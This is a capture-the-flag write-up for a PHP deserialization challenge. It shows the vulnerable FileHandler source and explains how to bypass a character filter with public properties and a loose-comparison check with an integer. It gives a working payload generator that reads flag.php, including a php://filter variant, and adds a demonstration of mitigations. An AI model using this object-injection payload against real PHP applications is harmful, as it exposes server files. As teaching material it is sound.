[wangdingbei 2020 Qinglong formation]areuserialz
2022-06-29 17:57:00 【Hua Weiyun】
Subject

```php
<?php
include("flag.php");
highlight_file(__FILE__);

class FileHandler {
    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}
```

Analysis
First, the is_valid() function has to be bypassed. is_valid() requires every character of the string to have an ASCII code between 32 and 125, but protected properties serialize with the invisible prefix \00*\00 on their names, and those bytes fall outside the allowed range.
Bypass method: PHP 7.1 and above are not sensitive to property visibility when unserializing, and public properties serialize without invisible characters, so public properties can be used to bypass the check. ==That is, when we finally construct the poc, we declare the attributes as public.==
Next, read() calls the sensitive function file_get_contents(), and process() calls read() on the condition op == "2" (a loose comparison).
__destruct() calls process(), but first resets op to "1" when op === "2" (a strict comparison); so read() is only reachable when op is not identical to the string "2".
This is a weak-type problem: constructing op=2 (an integer) fails the strict check but passes the loose one, which bypasses it.
```php
<?php
class FileHandler {
    public $op = 2;
    public $filename = "flag.php";
    public $content = "HappyCoder";
}
$a = new FileHandler();
echo serialize($a);
?>
```

Alternatively, use the php:// filter pseudo-protocol to read the file base64-encoded:

```php
public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
```
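To make the two points of the analysis concrete, the is_valid() bypass and the weak-type comparison, here is an added PHP demonstration that is not part of the original challenge or write-up. It re-implements is_valid() from the challenge, uses two hypothetical classes (ProtectedHandler and PublicHandler, names chosen here) that carry the same property names as FileHandler, and finishes with two mitigations a defender would apply to the handler. The class names, the branch_strict() helper and the printed labels are assumptions of this example.

```php
<?php
// Added demonstration, not part of the original challenge or write-up.
// It re-implements the challenge's is_valid() filter and shows why
// protected properties fail it, why an integer op of 2 slips past the
// "2" comparisons, and how a defender would close both gaps.

function is_valid(string $s): bool {
    for ($i = 0; $i < strlen($s); $i++) {
        if (!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) {
            return false;
        }
    }
    return true;
}

// Hypothetical class names chosen for this demo; the property names match
// the challenge's FileHandler. Protected visibility, as in the challenge.
class ProtectedHandler {
    protected $op = 2;
    protected $filename = "flag.php";
    protected $content = "HappyCoder";
}

// Same properties declared public, the bypass used in the write-up.
class PublicHandler {
    public $op = 2;
    public $filename = "flag.php";
    public $content = "HappyCoder";
}

$prot = serialize(new ProtectedHandler());
$pub  = serialize(new PublicHandler());

// A protected name is serialized as "\0*\0op": the two NUL bytes have
// ord() 0, outside the 32..125 window, so the filter rejects the whole
// payload. The public form carries no NUL bytes and passes.
echo "protected payload passes is_valid: ", var_export(is_valid($prot), true), "\n";
echo "public payload passes is_valid:    ", var_export(is_valid($pub), true), "\n";
echo addcslashes($prot, "\0"), "\n"; // NUL bytes printed as \000 so they are visible

// The weak-type gap: the integer 2 is not identical (===) to the string
// "2", so __destruct()'s strict check leaves op untouched, yet 2 == "2"
// is true, so process()'s loose check still selects the read() branch.
$op = 2;
echo "op === \"2\": ", var_export($op === "2", true), "\n";
echo "op == \"2\":  ", var_export($op == "2", true), "\n";

// Mitigation 1: compare the same way everywhere. With === in process()
// as well, an integer op never reaches read() or write().
function branch_strict($op): string {
    if ($op === "1") return "write";
    if ($op === "2") return "read";
    return "reject";
}
echo "strict branch for int 2: ", branch_strict($op), "\n";

// Mitigation 2: never rebuild application objects from user input.
// With allowed_classes => false, unserialize() yields a
// __PHP_Incomplete_Class instead of a FileHandler, so no __destruct()
// of the application class ever runs on attacker-controlled state.
$obj = unserialize($pub, ['allowed_classes' => false]);
echo "class rebuilt from untrusted input: ", get_class($obj), "\n";
```

Run it with the PHP CLI (PHP 7.1 or later, as the write-up's version note requires). The addcslashes() line is there because the NUL bytes that trip is_valid() are otherwise invisible in terminal output; the last section is the change that actually removes the risk, since a filter on characters cannot stop a payload that the unserializer will happily accept.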